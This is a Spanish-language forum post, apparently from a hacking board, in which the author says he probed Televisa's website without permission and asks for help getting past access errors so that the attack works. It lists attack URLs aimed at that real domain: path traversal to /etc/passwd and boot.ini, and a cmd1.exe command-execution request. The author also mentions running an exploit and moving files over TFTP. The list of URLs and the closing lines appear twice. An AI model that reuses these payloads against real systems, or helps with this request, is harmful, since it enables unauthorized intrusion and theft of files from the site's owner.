hola, soy nuevo jeje, pero bueno, espero que me ayuden , bueno eh hecho una auditoria de seguridad en la pagina web de televisa (obviamente sin permiso) y bueno encontré aproximadamente 252 bugs de las cuales unos 60 son de gravedad, la mayoria de los bugs tiene la vulnerabilidad de unicode, con solo ir a la direccion que te dice el script arrogado puedes ver el disco duro y agregando otros parametros puedes transferir un archivo mediante TFTP, pero bueno, al ir a dicho link no me permite ver lo que tiene, ya que tiene un molesto mensaje que dice, el documento que intento buscar no existe en nuestro servidor o no tiene permiso para acceder a el. bueno que puedo hacer para saltarme esto, por cierto ya lanze un exploit contra el servidor pero me arroga el mismo error, cuando trato de conectar con dichos links me dice lo mismo, bueno aqui les dejo los links
http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
http://www.televisa.com/cgi-bin/w3-msql
http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir
http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT
http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe
salu2 espero que me ayuden
gracias
http://www.televisa.com/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
http://www.televisa.com/cgi-bin/w3-msql
http://www.televisa.com/cgi-bin/cmd1.exe?/c+dir
http://www.televisa.com/cgi-bin/websync.exe?ed=&Es=7x1x101&un=nahual&hn=lab&rpt=/scheduler/En_US/WebResources&cbn=/cgi-bin/websync.exe&dow=sun&dmy=Off&tfh=Off&lan=En_US&ix=0&amd=2&epw=WiXwWFp&mrd=-1&mrc=0&mrb=0&bnv=9&ds=7x1x101&tzs=PST8PDT
http://www.televisa.com/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
buenos son algunos de 60 links, esta claro que el servidor se trata de windows, ya que estuve estudiando los links y te manejan dll y exe
salu2 espero que me ayuden
gracias